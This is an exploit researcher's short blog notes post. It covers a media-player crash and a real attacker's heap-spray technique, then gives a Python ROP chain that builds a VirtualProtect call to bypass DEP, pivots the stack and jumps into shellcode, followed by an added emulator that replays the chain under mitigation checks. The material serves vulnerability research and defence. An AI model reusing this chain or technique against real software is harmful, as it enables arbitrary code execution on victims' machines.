Notes
Posted on | November 2, 2011 | No Comments
http://mpc-hc.svn.sourceforge.net/viewvc/mpc-hc/trunk/src/filters/transform/MPCVideoDec/MPCVideoDecFilter.cpp?view=log
```c
// We crash inside this function
// In swscale.c: Function 'simpleCopy'
// Line: 1961 - Buffer Overrun
// This might be ffmpeg fault or more likely mpchc is not reinitializing ffmpeg correctly during display change (moving mpchc window from display A to display B)
```
Took me a long time before I stumbled on this by accident. Not easy to exploit for now. Pending.
All that time spent digging without symbols, wasted; heartbreaking. Lesson learned..
While this DLL seems interesting, it does not import VirtualAlloc, VirtualProtect, HeapCreate, WriteMemory or even a LoadLibrary, which complicates exploitation. However, the attacker did find and use other functions:
```text
4A84903C CreateFileA        // create the file iso88591
4A849038 CreateFileMappingA // attrib RWE
4A849030 MapViewOfFile      // load this file in memory with RWE flags
4A849170 memcpy             // copy the payload
```
The idea of the attacker was to spray the heap with a ROP pattern, followed by the shellcode. It first creates a file (iso88591) on disk, loads it with RWE attributes, copies the payload in memory and eventually executes the shellcode.
A new approach: bypassing DEP and ASLR.
```python
rop = [
rop_base + 0x1022, # retn
# Write lpfOldProtect
rop_base + 0x2c283, # pop eax; retn
heap - 0x1000, # lpfOldProtect -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write flNewProtect
rop_base + 0x2c283, # pop eax; retn
0x40, # flNewProtect -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write dwSize
rop_base + 0x2c283, # pop eax; retn
0x60000, # dwSize -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write lpAddress
rop_base + 0x2c283, # pop eax; retn
heap & ~0xfff, # lpAddress -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write &Pivot
rop_base + 0x2c283, # pop eax; retn
rop_base + 0x229a5, # &pivot -> eax
rop_base + 0x1db4f, # mov [esi],eax; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
rop_base + 0x3ab5e, # dec esi; retn
# Write &VirtualProtect
rop_base + 0x2c283, # pop eax; retn
rop_base + 0x1212a4, # IAT entry for VirtualProtect -> eax
rop_base + 0x12fda, # mov eax,DWORD PTR [eax]; retn
rop_base + 0x1db4f, # mov [esi],eax; retn
# Pivot ESP
rop_base + 0x229a5, # xchg esi,esp; retn;
# Jump into shellcode
rop_base + 0xdace8 # push esp; retn
]
```
ROP on Win8, with a few small changes.
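To see what the chain above actually assembles, here is an added example (not from this post or from any project it quotes): a minimal emulator for the gadget semantics given in the chain's comments that replays it, reports the VirtualProtect frame it builds, and applies the stack-pivot and memory-protection checks an API-hooking mitigation would make at that point. All addresses, the initial ESI and the thread stack bounds are constructed placeholders.

```python
# Constructed layout: the chain and its scratch frame both live in the spray,
# which is exactly what the mitigation checks at the VirtualProtect call notice.
STACK_LO, STACK_HI = 0x00120000, 0x00130000   # constructed thread stack range
HEAP = 0x0c0c0c0c                             # constructed spray address ("heap")
CHAIN_AT = HEAP + 0x400                       # where the chain sits in the spray
SCRATCH = HEAP + 0x300                        # initial ESI; frame grows downward from here
IAT_VP, VP_ADDR = 0x10001000, 0x7c801ad4      # constructed IAT slot and API address

# gadget offsets from the chain (rop_base = 0) -> semantics from its comments
G = {0x1022: "retn", 0x2c283: "pop eax", 0x1db4f: "mov [esi],eax",
     0x3ab5e: "dec esi", 0x12fda: "mov eax,[eax]", 0x229a5: "xchg esi,esp",
     0xdace8: "push esp; retn", VP_ADDR: "VirtualProtect"}

def build_chain():
    """The page's chain as a flat list of gadget offsets and immediates."""
    store = lambda v: [0x2c283, v, 0x1db4f] + [0x3ab5e] * 4  # pop eax; mov [esi],eax; dec esi x4
    return ([0x1022] + store(HEAP - 0x1000) + store(0x40) + store(0x60000)
            + store(HEAP & ~0xfff) + store(0x229a5)
            + [0x2c283, IAT_VP, 0x12fda, 0x1db4f, 0x229a5, 0xdace8])

def run(chain):
    """Return (API calls observed, address control lands on after the chain)."""
    mem = {CHAIN_AT + 4 * i: v for i, v in enumerate(chain)}
    mem[IAT_VP] = VP_ADDR
    r = {"esp": CHAIN_AT, "esi": SCRATCH, "eax": 0}
    def pop():
        v = mem[r["esp"]]; r["esp"] += 4; return v
    calls, eip = [], pop()
    while True:
        op = G[eip]
        if op == "pop eax":         r["eax"] = pop()
        elif op == "mov [esi],eax": mem[r["esi"]] = r["eax"]
        elif op == "dec esi":       r["esi"] -= 1
        elif op == "mov eax,[eax]": r["eax"] = mem[r["eax"]]
        elif op == "xchg esi,esp":  r["esi"], r["esp"] = r["esp"], r["esi"]
        elif op == "push esp; retn":
            return calls, r["esp"]             # lands on whatever follows the chain
        elif op == "VirtualProtect":
            esp_at_call = r["esp"]
            ret, (lp, size, prot, old) = pop(), [pop() for _ in range(4)]
            calls.append({"lpAddress": lp, "dwSize": size, "flNewProtect": prot,
                          "lpfOldProtect": old,
                          # stack pivot check: ESP has left the thread's stack
                          "pivoted": not STACK_LO <= esp_at_call < STACK_HI,
                          # the region being made RWX contains the current ESP
                          "covers_esp": lp <= esp_at_call < lp + size})
            eip = ret                          # stdcall popped ret + 4 args; return to &pivot
            continue
        eip = pop()
```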
https://code.google.com/p/address-sanitizer/
It seems Chrome has recently found quite a few use-after-free and out-of-bound bugs with this thing.
Bookmarked, +1~